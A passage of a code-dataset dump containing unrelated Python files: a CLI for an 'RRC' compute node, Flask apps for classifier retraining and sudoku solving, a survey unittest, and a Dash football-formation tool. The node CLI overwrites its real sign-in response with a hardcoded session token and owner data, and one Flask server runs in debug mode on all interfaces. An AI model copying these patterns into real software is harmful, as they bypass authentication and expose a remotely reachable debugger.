ownership.\")\n@click.option('--summary/--no-summary', default=None, help=\"The summary of the node ownership information.\")\n@click.option('--debug/--no-debug', default=None, help=\"Show debug logs.\")\ndef owner(setup, summary, debug):\n if debug:\n _debug = True\n xprint('Node', 'deb', 'Entering the cli owner command...')\n storing = Storing()\n if setup:\n xprint('Node', 'inf', 'Setting up Node\\' owner credentials')\n email = input('email on CoRR: ')\n session = storing.hook(\"Node\")\n instance_owner = Owner(email=email, rewards=0.0)\n session.add(instance_owner)\n session.commit()\n storing.release(\"Node\")\n\n if summary:\n session = storing.hook(\"Node\")\n instance_owner = session.query(Owner).first()\n if instance_owner:\n xprint('Node', 'inf', '\\n{0}'.format(instance_owner))\n else:\n xprint('Node', 'err', 'Error: No owner setup for this node.')\n xprint('Node', 'inf', 'Tip: You must setup the node owner\\'s for this to work.')\n xprint('Node', 'inf', 'Tip: rrc owner --setup.')\n xprint('Node', 'warn', 'Warning: You will not be able to call network commands [\\'summary\\', \\'price\\']')\n xprint('Node', 'inf', 'Tip: Setup the node owner if you plan to reach the network.')\n storing.release(\"Node\")\n\n@cmd.command()\n@click.option('--config/--no-config', default=None, help=\"Configure the node.\")\n@click.option('--summary/--no-summary', default=None, help=\"The summary of the node instance.\")\n@click.option('--start/--no-start', default=None, help=\"Start the node instance.\")\n@click.option('--stop/--no-stop', default=None, help=\"Stop the node instance.\")\n@click.option('--network/--no-network', default=None, help=\"Configure the node to be connected to the network.\")\n@click.option('--debug/--no-debug', default=None, help=\"Show debug logs.\")\ndef node(config, summary, start, stop, network, debug):\n if debug:\n _debug = True\n\n xprint('Node', 'deb', 'RRC Node >> Entering the cli node command...')\n storing = Storing()\n networking = Networking()\n computing = Computing()\n networking.link_storage(storing)\n computing.link_storage(storing)\n net_pub = networking.network_pub()\n\n session = storing.hook(\"Node\")\n current_node = session.query(Instance).first()\n if current_node and not current_node.localhost:\n networking.connect()\n storing.connect()\n storing.release(\"Node\")\n\n if net_pub:\n storing.network_pub(net_pub)\n else:\n xprint('Node', 'err', 'Error: Cannot reach the RRC network.')\n xprint('Node', 'warn', 'Warning: Requests to the network will most likely fail.')\n xprint('Node', 'inf', 'Tip: Please check that you have a reliable internet connexion.')\n\n if summary:\n session = storing.hook(\"Node\")\n instance = session.query(Instance).first()\n if instance:\n xprint('Node', 'inf', '\\n{0}'.format(instance))\n else:\n xprint('Node', 'err', 'Error: You must configure the node before using this command features.')\n xprint('Node', 'inf', 'Tip: rrc node --config')\n storing.release(\"Node\")\n\n if config:\n # Check if the owner is sure to reconfigure teh node again before continuing.\n xprint('Node', 'warn', 'Warning: The following action will reset your current setup.')\n go_on = input(\"Are you sure about this: y(es) | n(o) ? \")\n counter = 0\n while go_on.lower() not in [\"y\", \"n\"]:\n counter += 1\n xprint('Node', 'warn', 'Warning: Unknown answer. (y)es/(n)o. Attempt({0}/5)'.format(counter))\n go_on = input(\"Are you sure about this: y(es) | n(o) ? \")\n if counter == 5:\n break\n if counter == 5:\n xprint('Node', 'warn', 'Warning: Maximum attempts reached. Cheers!')\n return\n else:\n if go_on.lower() == \"n\":\n xprint('Node', 'warn', 'Well understood. Cheers!')\n return\n storing.generate_rsa()\n storing.rsa_private()\n storing.rsa_public()\n\n session = storing.hook(\"Node\")\n current_node = session.query(Instance).first()\n if current_node:\n session.delete(current_node)\n current_node = Instance(version=_version, identifier=storing.signature_node(), session=\"unknown\", localhost=True, status=\"config\", rewards=0.0)\n session.add(current_node)\n session.commit()\n current_owner = session.query(Owner).first()\n if current_owner:\n response = networking.node_configure(current_owner.email)\n if response:\n xprint('Node', 'inf', 'Network Handshake success!')\n else:\n xprint('Node', 'err', 'Error: Could not achieve a proper handshake with the RRC network.')\n xprint('Node', 'warn', 'Warning: You will not be able to call network commands [\\'summary\\', \\'price\\']')\n else:\n xprint('Node', 'warn', 'Warning: No owner setup for this node.')\n xprint('Node', 'inf', 'Tip: rrc owner --setup.')\n xprint('Node', 'warn', 'Warning: You will not be able to call network commands [\\'summary\\', \\'price\\']')\n xprint('Node', 'inf', 'Tip: Setup the node owner if you plan to reach the network.')\n\n storing.release(\"Node\")\n else:\n session = storing.hook(\"Node\")\n current_node = session.query(Instance).first()\n if current_node is None:\n storing.release(\"Node\")\n xprint('Node', 'err', 'Error: You must configure the node before using this command features.')\n xprint('Node', 'inf', 'Tip: rrc node --config.')\n xprint('Node', 'warn', 'Warning: You will not be able to call network commands [\\'summary\\', \\'price\\']')\n xprint('Node', 'inf', 'Tip: Setup the node owner if you plan to reach the network.')\n return\n else:\n storing.rsa_private()\n storing.rsa_public()\n\n current_owner = session.query(Owner).first()\n if current_owner:\n response = networking.node_configure(current_owner.email)\n if response:\n xprint('Node', 'inf', 'Network Handshake success!')\n else:\n xprint('Node', 'err', 'Error: Could not achieve a proper handshake with the RRC network.')\n xprint('Node', 'warn', 'Warning: You will not be able to call network commands [\\'summary\\', \\'price\\']')\n else:\n xprint('Node', 'warn', 'Warning: No owner setup for this node.')\n xprint('Node', 'inf', 'Tip: rrc owner --setup.')\n xprint('Node', 'warn', 'Warning: You will not be able to call network commands [\\'summary\\', \\'price\\']')\n xprint('Node', 'inf', 'Tip: Setup the node owner if you plan to reach the network.')\n storing.release(\"Node\")\n\n if network:\n session = storing.hook(\"Node\")\n current_node = session.query(Instance).first()\n history = session.query(History).all()\n if current_node:\n if len(history) > 0 and current_node.localhost:\n storing.release(\"Node\")\n xprint('Node', 'err', 'Error: Previous localhost configuration found on the system.')\n xprint('Node', 'inf', 'Tip: Reconfigure the node with --network to proceed.')\n overwride = input(\"Unless you want to erase the current configuration: (y)es | (n)o ? \")\n if overwride.lower() == \"y\":\n current_node.localhost = False\n for hst in history:\n session.detele(hst)\n for qu in session.query(Queu).all():\n session.delete(qu)\n for cnt in session.query(Contract).all():\n session.delete(cnt)\n for lg in session.query(Log).all():\n session.delete(lg)\n session.commit()\n elif overwride.lower() == \"n\":\n storing.release(\"Node\")\n xprint('Node', 'warn', 'Well understood. Cheers!')\n return\n else:\n storing.release(\"Node\")\n xprint('Node', 'warn', 'Warning: Unknown answer. (y)es/(n)o.')\n return\n else:\n current_node.localhost = False\n session.commit()\n storing.release(\"Node\")\n session = storing.hook(\"Node\")\n current_owner = session.query(Owner).first()\n if current_owner is None:\n storing.release(\"Node\")\n xprint('Node', 'err', 'Error: No owner setup for this node.')\n xprint('Node', 'inf', 'Tip: Please setup the node owner before attempting (1).')\n xprint('Node', 'inf', 'Tip: to configure the it over the RRC network (2).')\n xprint('Node', 'inf', 'Tip: rrc owner --setup.')\n xprint('Node', 'warn', 'Warning: You will not be able to call network commands [\\'summary\\', \\'price\\']')\n xprint('Node', 'inf', 'Tip: Setup the node owner if you plan to reach the network.')\n return\n else:\n storing.release(\"Node\")\n networking.connect()\n storing.connect()\n else:\n session = storing.hook(\"Node\")\n current_node = session.query(Instance).first()\n history = session.query(History).all()\n if len(history) > 0 and not current_node.localhost:\n storing.release(\"Node\")\n xprint('Node', 'err', 'Error: Previous non localhost configuration found on the system.')\n xprint('Node', 'inf', 'Tip: Reconfigure the node without --network to proceed.')\n overwride = input(\"Unless you want to erase the current configuration: (y)es | (n)o ? \")\n if overwride.lower() == \"y\":\n current_node.localhost = True\n for hst in history:\n session.detele(hst)\n for qu in session.query(Queu).all():\n session.delete(qu)\n for cnt in session.query(Contract).all():\n session.delete(cnt)\n for lg in session.query(Log).all():\n session.delete(lg)\n session.commit()\n storing.release(\"Node\")\n else:\n storing.release(\"Node\")\n xprint('Node', 'warn', 'Well understood. Cheers!')\n return\n else:\n if not current_node.localhost:\n networking.connect()\n storing.connect()\n xprint('Node', 'deb', 'Network Connected!')\n storing.release(\"Node\")\n\n if start:\n if networking.connected():\n session = storing.hook(\"Node\")\n instance_owner = session.query(Owner).first()\n owner = None\n if instance_owner is None:\n xprint('Node', 'err', 'Error: No owner setup found for this node.')\n xprint('Node', 'inf', 'Tip: Please setup the node owner before attempting (1).')\n xprint('Node', 'inf', 'Tip: to configure the it over the RRC network (2).')\n xprint('Node', 'warn', 'Warning: You will not be able to call network commands [\\'summary\\', \\'price\\']')\n xprint('Node', 'inf', 'Tip: Setup the node owner if you plan to reach the network.')\n storing.release(\"Node\")\n return\n else:\n owner = instance_owner.email\n storing.release(\"Node\")\n\n xprint('Node', 'warn', 'Warning: Node Owner [{0}] credentials required here.'.format(instance_owner.email))\n password1 = getpass.getpass('password on CoRR: ')\n password2 = getpass.getpass('again on CoRR: ')\n counter = 0\n while password1 != password2:\n counter += 1\n xprint('Node', 'err', 'Error: Password Mismatch! Attempt({0})'.format(counter))\n password1 = getpass.getpass('password on CoRR: ')\n password2 = getpass.getpass('again on CoRR: ')\n\n if counter == 5:\n break\n if counter == 5:\n xprint('Node', 'warn', 'Warning: Maximum attempts reached. Cheers!')\n return\n else:\n # network.\n response = networking.node_network(instance_owner.email, password1)\n response = {}\n response[\"node\"] = {}\n response[\"node\"][\"session\"] = \"f268471e598bf5acd768871b169d274b025bf8b62eb388585d27ac00911f036b\"\n response[\"owner\"] = {}\n response[\"owner\"][\"fname\"] = \"Faical Yannick\"\n response[\"owner\"][\"lname\"] = \"Congo\"\n response[\"owner\"][\"rewards\"] = 1000\n if response == None:\n xprint('Node', 'err', 'Error: could not sign in the RRC network.')\n else:\n session = storing.hook(\"Node\")\n\n instance_owner = session.query(Owner).first()\n instance_owner.fname = response['owner']['fname']\n instance_owner.lname = response['owner']['lname']\n instance_owner.rewards = response['owner']['rewards']\n\n current_node = session.query(Instance).first()\n current_node.session = response['node']['session']\n\n session.commit()\n current_node = session.query(Instance).first()\n # if current_node.component_networking:\n # storing.release(\"Node\")\n # xprint('Node', 'warn', 'Warning: Running networking component found!')\n # xprint('Node', 'inf', 'Info: Only one networking component allowed to run at a time.')\n # else:\n current_node.status = \"running\"\n session.commit()\n\n storing.release(\"Node\")\n # Launch the network daemon.\n xprint('Node', 'inf', 'Networking component starting up...')\n pid1 = networking.start()\n # Save pid into current_node component networking.\n xprint('Node', 'warn', pid1)\n # Launch the computing daemon.\n xprint('Node', 'inf', 'Computing component starting up...')\n pid2 = computing.start()\n # Save pid into current_node component computing.\n xprint('Node', 'warn', pid2)\n else:\n # Localhost.\n # Launch the computing Thread.\n # Configure computing.\n session = storing.hook(\"Node\")\n current_node = session.query(Instance).first()\n # if current_node.component_computing:\n # storing.release(\"Node\")\n # xprint('Node', 'warn', 'Warning: Running computing component found!')\n # xprint('Node', 'inf', 'Info: Only one computing component allowed to run at a time.')\n # else:\n current_node.status = \"running\"\n session.commit()\n storing.release(\"Node\")\n # Launch the computing daemon.\n xprint('Node', 'inf', 'Computing component starting up...')\n pid = computing.start()\n\n if stop:\n xprint('Node', 'warn', 'You are about to stop this RRC node.')\n sure = input(\"Do you really want to proceed: (y)es | (n)o ? \")\n if sure.lower() == \"y\":\n session = storing.hook(\"Node\")\n current_node = session.query(Instance).first()\n status = current_node.status\n session.commit()\n storing.release(\"Node\")\n if status != \"stopped\":\n session = storing.hook(\"Node\")\n current_node = session.query(Instance).first()\n current_node.status = \"stopping\"\n session.commit()\n if not current_node.localhost:\n networking.connect()\n storing.connect()\n storing.release(\"Node\")\n session = storing.hook(\"Node\")\n current_node = session.query(Instance).first()\n current_node.status = \"stopped\"\n session.commit()\n storing.release(\"Node\")\n xprint('Node', 'inf', 'This RRC Node stopped')\n elif sure.lower() == \"n\":\n xprint('Node', 'warn', 'Well understood. Cheers!')\n else:\n xprint('Node', 'warn', 'Warning: Unknown answer. (y)es/(n)o.')\n\n\n@cmd.command()\n@click.option('--queu/--no-queu', default=None, help=\"Show the summary of the contracts queu on the node.\")\n@click.option('--show', default=None, help=\"Show details of a specific contract from its id.\")\n@click.option('--page', default=1, help=\"Paginate the contracts display.\")\n@click.option('--submit', default=None, help=\"Submit a contract to a localhost instance.\")\n@click.option('--cancel', default=None, help=\"Cancel a contract on a localhost instance.\")\n@click.option('--clean/--no-queu', default=None, help=\"Wipe all the contracts.\")\n@click.option('--debug/--no-debug', default=None, help=\"Show debug logs.\")\n# Before going on the network the localhost instance has to be wipped clean.\n# Same thing before starting a localhost from a network instance.\ndef contract(queu, show, page, submit, cancel, clean, debug):\n if debug:\n _debug = True\n xprint('Node', 'deb', 'Entering the cli contract command...')\n storing = Storing()\n networking = Networking()\n computing = Computing()\n networking.link_storage(storing)\n computing.link_storage(storing)\n\n session = storing.hook(\"Node\")\n current_node = session.query(Instance).first()\n\n current_node.status = \"stopping\"\n session.commit()\n\n if not current_node.localhost:\n networking.connect()\n storing.connect()\n storing.release(\"Node\")\n\n if queu:\n xprint('Node', 'deb', 'Pretty Table of the queu.')\n computing.queu()\n\n elif show:\n xprint('Node', 'deb', 'Showing a specific contract.')\n computing.show(show)\n\n elif submit:\n xprint('Node', 'deb', 'Submitting a contract.')\n computing.submit(submit)\n\n elif cancel:\n xprint('Node', 'deb', 'Requesting node to cancel a contract.')\n computing.cancel(cancel)\n\n elif clean:\n # Submit only work in localhost. or online when the components are off the network.\n xprint('Node', 'warn', 'You are about to erase all your workload.')\n sure = input(\"Do you really want to proceed: (y)es | (n)o ? \")\n if sure.lower() == \"y\":\n session = storing.hook(\"Node\")\n current_queu = session.query(Queu).all()\n current_contracts = session.query(Contract).all()\n for qu in current_queu:\n session.delete(qu)\n for cnt in current_contracts:\n session.delete(cnt)\n session.commit()\n storing.release(\"Node\")\n elif sure.lower() == \"n\":\n xprint('Node', 'warn', 'Well understood. Cheers!')\n else:\n xprint('Node', 'warn', 'Warning: Unknown answer. (y)es/(n)o.')\n else:\n xprint('Node', 'deb', 'Pretty Table of the contracts.')\n computing.contracts(page)\n\n@cmd.command()\n@click.option('--summary/--no-summary', default=None, help=\"Show the summary of the latest events stored.\")\n@click.option('--page', default=None, help=\"Show the summary of the events on a specific page.\")\n@click.option('--show', default=None, help=\"Show the details of a specific event.\")\n@click.option('--clean/--no-clean', default=None, help=\"Wipe all the events.\")\n@click.option('--filter', default=None, help=\"Filter some events list based on keywords.\")\n@click.option('--export', default='json', type=click.Choice(['json', 'yaml', 'xml', 'txt']), help=\"Export a list of events to a specific format.\")\n@click.option('--email', default=None, help=\"Email a list of events.\")\n@click.option('--debug/--no-debug', default=None, help=\"Show debug logs.\")\ndef history(summary, page, show, clean, filter, export, email, debug):\n if debug:\n _debug = True\n xprint('Node', 'deb', 'Entering the cli history command...')\n\nif __name__ == '__rrc.main__':\n cmd()\n","sub_path":"rrc/main/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":27059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"579248474","text":"import os, io, pickle, re, glob, argparse\nimport pandas as pd\nfrom functions import new_nn_learning, nn_updating_new_data\nfrom flask import Flask, request, Response, send_file, make_response\n\napp = Flask(__name__)\n\n#страница загрузки\n@app.route('/')\ndef index():\n return send_file(os.path.join(data_rout, 'file_loading_form.html'))\n\n# Страница, куда постим CSV файл для обработки\n@app.route('/', methods=[ 'POST' ])\ndef nn_lerning():\n #выгрузим размеченные тексты\n file = request.files['f']\n ds = pd.DataFrame(pd.read_csv(file))\n\n #отберем те классы примеров, для которых есть модели:\n tag_nums = []\n for fn in glob.glob(os.path.join(model_rout, '*.h5')):\n tag_num = re.findall('\\d*_', fn)\n if tag_num !=[]:\n tag_nums.append(re.sub('_', '', tag_num[0]))\n\n\n #выберем те тексты, для которых моделей нет и модели по которым надо будет создать и обучить:\n txts_for_initial_learning_df = ds[~ds['lbs'].isin(tag_nums)]\n #выберем те тексты, по которым надо будет модели дообучить:\n txts_for_adding_learning_df = ds[ds['lbs'].isin(tag_nums)]\n\n print(txts_for_adding_learning_df[txts_for_adding_learning_df['lbs'].isin([6, 13])])\n set(list(txts_for_adding_learning_df['lbs']))\n\n #создадим модели для классов, по которым еще нет моделей:\n new_nn_learning(model_rout, data_rout, dict_rout, txts_for_initial_learning_df, nn_epochs=3)\n\n #дообучим модели по классам, по которым модели уже существуют:\n df_test = txts_for_adding_learning_df[txts_for_adding_learning_df['lbs'].isin([6, 13])]\n nn_updating_new_data(df_test, model_rout, nn_epochs=3)\n \n mf = io.BytesIO()\n #mf = io.StringIO()\n mf.write('I have done job!'.encode('utf-8'))\n mf.seek(0)\n \n return send_file(mf, attachment_filename='report.txt', as_attachment=True)\n\nif __name__ == '__main__':\n parser=argparse.ArgumentParser(description='Классификатор')\n parser.add_argument('--host', dest='host', default='0.0.0.0')\n parser.add_argument('--port', dest='port', default=5001)\n args=parser.parse_args()\n global model_rout\n model_rout = r'./models'\n global data_rout\n data_rout = r'./data/'\n global dict_rout\n dict_rout = r'./dicts'\n \n app.run(debug=True, host=args.host, port=int(args.port))","sub_path":"draft/abc_flask_serv.py","file_name":"abc_flask_serv.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"560978924","text":"import os\nimport uuid\nimport logging\nimport subprocess\n\nfrom flask import Flask, request, redirect, url_for, render_template\nfrom werkzeug.utils import secure_filename\nfrom werkzeug.datastructures import FileStorage\nfrom sudoku_solver import sudoku_solver\n\n\nlogging.basicConfig(\n format=\"%(asctime)s %(levelname)s - %(message)s\",\n level=logging.INFO,\n datefmt='%Y-%m-%d %H:%M:%S'\n)\n\nUPLOAD_FOLDER = \"./static/uploads/\"\nALLOWED_EXTENSIONS = {\"png\", \"jpg\", \"jpeg\"}\n\napplication = Flask(__name__)\napplication.config[\"UPLOAD_FOLDER\"] = UPLOAD_FOLDER\napplication.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024 # Limit to 16MB\n\n\ndef _allowed_file(filename: str) -> bool:\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\ndef _randomise_file_name(f: FileStorage) -> str:\n filename_with_extension = secure_filename(f.filename)\n extension = os.path.splitext(filename_with_extension)[1]\n\n randomised_filename = str(uuid.uuid4())\n\n return randomised_filename + extension\n\n\n@application.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n if request.method == \"POST\":\n f = request.files[\"file\"]\n\n if f and _allowed_file(f.filename):\n filename = _randomise_file_name(f)\n logging.info(f\"Received file {filename}\")\n\n f.save(os.path.join(application.config[\"UPLOAD_FOLDER\"], filename))\n\n parsed_text = \"\\n\" + subprocess.run(\n [\"./sudoku_parser\", \"./static/uploads/\" + filename],\n stdout=subprocess.PIPE).stdout.decode('utf-8')\n\n logging.info(f\"Parsed text: {parsed_text}\")\n\n solution = sudoku_solver(parsed_text)\n\n logging.info(f\"Solution: {solution}\")\n\n # Join to a single string for putting into the template\n solution = ''.join(str(item) for innerlist in solution for item in innerlist)\n\n return redirect(url_for(\n \"index\", solution=solution, filename=\"uploads/\" + filename))\n\n if request.method == \"GET\":\n filename = request.args.get(\"filename\", default=\"\", type=str)\n solution = request.args.get(\"solution\", default=\"\", type=str)\n\n return render_template(\"index.html\", solution=solution, filename=filename)\n\n\nif __name__ == \"__main__\":\n application.run(host=\"0.0.0.0\")\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"390675848","text":"import unittest\nfrom survey import AnonymousSurvey \n\nclass TestAnonymousSurvey(unittest.TestCase):\n\t\"\"\"Tests for the class AnonymousSurvey\"\"\"\n\n\tdef setUp(self):\n\t\t\"\"\"Creat a survey and a set of responses for use in all test methods\"\"\"\n\t\tquestion = \"What language did you first learn to speak ?\"\n\t\tself.my_survey = AnonymousSurvey(question)\n\t\tself.responses = ['English','Spanish','French']\n\n\tdef test_store_single_response(self):\n\t\t\"\"\"Test that a single response is stored properly\"\"\"\n\t\tself.my_survey.store_responses('English')\n\t\tself.assertIn('English',self.my_survey.responses)\n\n\tdef test_three_store_responses(self):\n\t\t\"\"\"Test for three responses\"\"\"\n\t\t\n\t\tfor response in self.responses:\n\t\t\tself.my_survey.store_responses(response)\n\n\t\tfor response in self.responses:\n\t\t\tself.assertIn(response,self.my_survey.responses)\n\n\t\t\n\nif __name__ == '__main__':\n\tunittest.main()\n\n\n","sub_path":"src/chapter09/test_survey.py","file_name":"test_survey.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"12421523","text":"import dash\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output\r\nimport plotly.graph_objs as go\r\nimport base64\r\nimport pandas as pd\r\nimport pitch_plotly as pitch\r\nimport numpy as np\r\nimport ds4d as machine\r\nfrom app import app\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\npath = 'C:\\\\Users\\\\iq10189\\\\Desktop\\\\University_of_Edinburgh\\\\Data Science for Design\\\\FIFA\\\\DS4D\\\\data\\\\dataset.csv'\r\noriginal_data = pd.read_csv(path, sep=';' , decimal=',')\r\nteams = original_data.sort_values('team')['team'].unique()\r\n######Fitting Classification algorithm\r\ny = original_data.loc[:,'cluster'] \r\nx = original_data.loc[:,'C1':'Y11']\r\nsplit = np.rint(0.8*x.shape[0])\r\nX_clean_train = x[:int(split)].values\r\nX_clean_val = x[int(split):].values\r\ny_train = y[:int(split)]\r\ny_val = y[int(split):]\r\nlogreg = LogisticRegression(solver='lbfgs')\r\nlogreg.fit(X_clean_train, y_train)\r\n#####\r\ndemo_dict={}\r\nold_form={}\r\nML=[]\r\nfor i in range(0,11):\r\n\tML.append([])\r\n\t\r\nlayout = html.Div([\r\n\thtml.Div([\r\n\t\thtml.Div([\r\n\t\t\thtml.Div([\r\n\t\t\t\thtml.Label(\"Choose your Team\"),\r\n\t\t\t\tdcc.Dropdown(\r\n\t\t\t\t\tid='Team_for_Formation',\r\n\t\t\t\t\toptions=[{'label':i,'value':i} for i in teams],\r\n\t\t\t\t\tvalue = 'Spain')\r\n\t\t\t\t],\r\n\t\t\t\tstyle={'width': '32%', 'display': 'inline-block'}),\r\n\t\t\thtml.Div([\r\n\t\t\t\thtml.Label(\"Pick a Cluster\"),\r\n\t\t\t\tdcc.Dropdown(id=\"Cluster_for_Formation\",\r\n\t\t\t\tvalue=1)\r\n\t\t\t\t],\r\n\t\t\tstyle={'width': '32%', 'display': 'inline-block'}),\r\n\t\t\thtml.Div([\r\n\t\t\t\thtml.Label(\"Pick a Game\"),\r\n\t\t\t\tdcc.Dropdown(id=\"Game_for_Formation\",\r\n\t\t\t\tvalue=588)\r\n\t\t\t\t],\r\n\t\t\tstyle={'width': '32%', 'display': 'inline-block'}),\r\n\t\t\t]),\r\n\t\thtml.Div([\r\n\t\t\tdcc.Graph(id='Football_Pitch_Mul',config={'displayModeBar': False})],\r\n\t\tstyle={'width': '48%','display': 'inline-block'}),\t\r\n\thtml.Div([\t\r\n\t\thtml.Label(\"Select a Player\"),\r\n\t\tdcc.Dropdown(\r\n\t\t\tid = 'Player',\r\n\t\t\toptions =[{'label':\"Player %s\"%i, 'value':i} for i in range(1,12)],\r\n\t\t\tvalue=1),\r\n\t\thtml.Label(\"Modify X Position\"),\r\n\t\tdcc.Slider(\r\n\t\t\tid='X_slider',\r\n\t\t\tmin=0,\r\n\t\t\tmax=100,\r\n\t\t\tstep=0.1),\r\n\t\thtml.Label(\"Modify Y position\"),\r\n\t\tdcc.Slider(\r\n\t\t\tid='Y_slider',\r\n\t\t\tmin=0,\r\n\t\t\tmax=100,\r\n\t\t\t#marks={i*10:str(i*10) for i in range(1,11)},\r\n\t\t\tstep=0.1),\r\n\t\thtml.Label(\"Modify Betweenness\"),\r\n\t\tdcc.Slider(\r\n\t\t\tid='Bet_slider',\r\n\t\t\tmin=0,\r\n\t\t\tmax=1,\r\n\t\t\t#marks={i/10:str(i/10) for i in range(1,11)},\r\n\t\t\tstep=0.001),\r\n\t\thtml.Label(\"Modify Closeness\"),\r\n\t\tdcc.Slider(\r\n\t\t\tid='Clo_slider',\r\n\t\t\tmin=0,\r\n\t\t\tmax=10,\r\n\t\t\t#marks={i:str(i) for i in range(1,11)},\r\n\t\t\tstep=0.01),\r\n\t\t\thtml.Button(id ='submit',n_clicks=0, children=\"Submit Player\")],\r\n\t\tstyle={'width': '50%','display': 'inline-block'}),\r\n\t]),\r\n\thtml.Div([\r\n\t\thtml.Div([\r\n\t\t\tdcc.Graph(id=\"Football_Pitch\"),\r\n\t\t\thtml.Button(id=\"submit_team\",n_clicks=0, children=\"Submit New Formation\")],\r\n\t\tstyle={'width': '50%','display': 'inline-block'}),\r\n\t\thtml.Div(id='print',\r\n\t\tstyle={'width': '50%','display': 'inline-block'}),\r\n\t])\r\n\t\r\n])\r\n\r\n#Dropdowns\r\n@app.callback(\r\n\tdash.dependencies.Output('Cluster_for_Formation','options'),\r\n\t[dash.dependencies.Input('Team_for_Formation', 'value')])\r\ndef set_cluster_options(selected_team):\r\n\tavail_clus=original_data.loc[original_data['team']==selected_team]['cluster'].unique()\r\n\treturn [{'label': i, 'value': i} for i in avail_clus]\r\n@app.callback(\r\n\tdash.dependencies.Output('Game_for_Formation','options'),\r\n\t[dash.dependencies.Input('Team_for_Formation', 'value'),\r\n\tdash.dependencies.Input('Cluster_for_Formation', 'value')])\r\ndef set_game_options(selected_team,selected_cluster):\r\n\tavail_games=original_data.loc[(original_data['team']==selected_team) &(original_data['cluster']==selected_cluster)]\r\n\treturn [{'label': i+1, 'value': j} for i,j in enumerate(avail_games.index)]\r\n\t\r\n#Figure 2\r\n@app.callback(\r\n\tdash.dependencies.Output('Football_Pitch_Mul', 'figure'),\r\n\t[dash.dependencies.Input('Game_for_Formation', 'value')])\r\ndef update_graph_Field(game):\r\n\tglobal demo_dict,ML\r\n\tdemo_dict={}\r\n\ttitle = 'Initial Formation'\r\n\tplotter = pitch.Plotter(title)\r\n\tdemo_arr=[]\r\n\ttemp_frame = original_data.iloc[game]\r\n\tfor i in range(1,12):\r\n\t\tplayer=[temp_frame['X%s' %i],temp_frame['Y%s' %i],\\\r\n\t\t'Player %s' %i,15]\r\n\t\tML[i-1]=[temp_frame['C%s' %i],temp_frame['B%s' %i],temp_frame['X%s' %i],temp_frame['Y%s' %i]]\r\n\t\tdemo_arr.append(player)\r\n\tplotter.add_events(demo_arr)\r\n\tdata, layout = plotter.plot()\r\n\treturn {'data': data, 'layout': layout}\t\r\n\r\n###X function\r\n@app.callback(\r\n\tdash.dependencies.Output('X_slider','value'),\r\n\t[dash.dependencies.Input('Player', 'value'),\r\n\tdash.dependencies.Input('Game_for_Formation', 'value')])\r\ndef set_X_initial(player,game):\r\n\ttemp_frame = original_data.iloc[game]\r\n\tmean = temp_frame['X%s'%player]\r\n\treturn mean\r\n\r\n@app.callback(\r\n\tdash.dependencies.Output('X_slider','min'),\r\n\t[dash.dependencies.Input('Player', 'value')])\r\ndef set_clusterA_options(player):\r\n\tmin=original_data['X%s'%player].min()\r\n\treturn min\r\n\t\r\n@app.callback(\r\n\tdash.dependencies.Output('X_slider','max'),\r\n\t[dash.dependencies.Input('Player', 'value')])\r\ndef set_clusterA_options(player):\r\n\tmax=original_data['X%s'%player].max()\r\n\treturn max\r\n\t\r\n###Y functions\r\n@app.callback(\r\n\tdash.dependencies.Output('Y_slider','value'),\r\n\t[dash.dependencies.Input('Player', 'value'),\r\n\tdash.dependencies.Input('Game_for_Formation', 'value')])\r\ndef set_clusterA_options(player,game):\r\n\ttemp_frame=original_data.iloc[game]\r\n\tmean = temp_frame['Y%s'%player]\r\n\treturn mean\r\n\r\n@app.callback(\r\n\tdash.dependencies.Output('Y_slider','min'),\r\n\t[dash.dependencies.Input('Player', 'value')])\r\ndef set_clusterA_options(player):\r\n\tmin=original_data['Y%s'%player].min()\r\n\treturn min\r\n\t\r\n@app.callback(\r\n\tdash.dependencies.Output('Y_slider','max'),\r\n\t[dash.dependencies.Input('Player', 'value')])\r\ndef set_clusterA_options(player):\r\n\tmax=original_data['Y%s'%player].max()\r\n\treturn max\r\n###Between\r\n@app.callback(\r\n\tdash.dependencies.Output('Bet_slider','value'),\r\n\t[dash.dependencies.Input('Player', 'value'),\r\n\tdash.dependencies.Input('Game_for_Formation', 'value')])\r\ndef set_clusterA_options(player,game):\r\n\ttemp_frame = original_data.iloc[game]\r\n\tmean = temp_frame['B%s'%player]\r\n\treturn mean\r\n\r\n@app.callback(\r\n\tdash.dependencies.Output('Bet_slider','min'),\r\n\t[dash.dependencies.Input('Player', 'value')])\r\ndef set_clusterA_options(player):\r\n\tmin=original_data['B%s'%player].min()\r\n\treturn min\r\n\t\r\n@app.callback(\r\n\tdash.dependencies.Output('Bet_slider','max'),\r\n\t[dash.dependencies.Input('Player', 'value')])\r\ndef set_clusterA_options(player):\r\n\tmax=original_data['B%s'%player].max()\r\n\treturn max\r\n\r\n###Close\t\r\n@app.callback(\r\n\tdash.dependencies.Output('Clo_slider','value'),\r\n\t[dash.dependencies.Input('Player', 'value'),\r\n\tdash.dependencies.Input('Game_for_Formation', 'value')])\r\ndef set_clusterA_options(player,game):\r\n\ttemp_frame = original_data.iloc[game]\r\n\tmean = temp_frame['C%s'%player]\r\n\treturn mean\r\n\r\n@app.callback(\r\n\tdash.dependencies.Output('Clo_slider','min'),\r\n\t[dash.dependencies.Input('Player', 'value')])\r\ndef set_clusterA_options(player):\r\n\tmin=original_data['C%s'%player].min()\r\n\treturn min\r\n\t\r\n@app.callback(\r\n\tdash.dependencies.Output('Clo_slider','max'),\r\n\t[dash.dependencies.Input('Player', 'value')])\r\ndef set_clusterA_options(player):\r\n\tmax=original_data['C%s'%player].max()\r\n\treturn max\r\n\t\r\n\t\r\n@app.callback(\r\n\tdash.dependencies.Output('Football_Pitch', 